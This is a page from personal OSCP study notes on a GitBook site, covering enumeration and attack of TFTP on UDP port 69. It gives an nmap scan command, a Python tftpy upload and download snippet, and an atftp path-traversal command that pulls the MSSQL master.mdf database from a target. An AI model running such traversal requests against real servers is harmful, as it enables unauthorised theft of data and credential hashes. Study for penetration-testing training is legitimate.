OffSec Notes
All Gitbook
OSCP
OSCP
  • General
    • Common Operations (tty, SSH, rbash)
      • Linux commands
      • File transfer
      • run powershell
    • Post-exploit check
    • Privesc
      • Linux
      • Windows
        • UAC eventvwr
    • Metasploit
    • Python
  • Reconnaissance
    • DNS 53
    • Nmap / Masscan / Autorecon
    • Searchsploit
    • Services
      • SMTP 25
      • SMB 139, 445
      • MSSQL 1433
      • MYSQL 3306
      • TFTP UDP 69
    • Target Host Enumeration
  • Common Attack
    • Buffer Overflow
    • MS Office
  • Web Attack
    • Web Enumeration
    • Webshell to stable shell
      • WordPress
    • SQL Injections & Enum
  • Password Attack
    • Bruteforce
    • Hash Crack
    • Custom Wordlist
    • SSH Authorized_key reuse
      • persisting ssh login with ssh-keygen
  • AD Attack
    • Enumeration
      • Flow
    • Ticket manipulations mimi
      • Silver / Golden
    • DCOM P.664 / AD DCOM .one
    • Password hash dump and reuse
    • Impersonating token & pivot
      • Persisting access with DC admin
    • Tunneling / (with SSH key)
Powered by GitBook
On this page
  1. Reconnaissance
  2. Services

TFTP UDP 69

sudo nmap -n -Pn -sU -p69 -sV --script tftp-enum 10.11.1.111

import tftpy
client = tftpy.TftpClient(<ip>, <port>)
client.download("filename in server", "/tmp/filename", timeout=5)
client.upload("filename to upload", "/local/path/file", timeout=5)
atftp
get ../../../PROGRA~1/MICROS~1/MSSQL14.SQLEXPRESS/MSSQL/DATA/master.mdf master2.mdf
PreviousMYSQL 3306NextTarget Host Enumeration

Last updated 2 years ago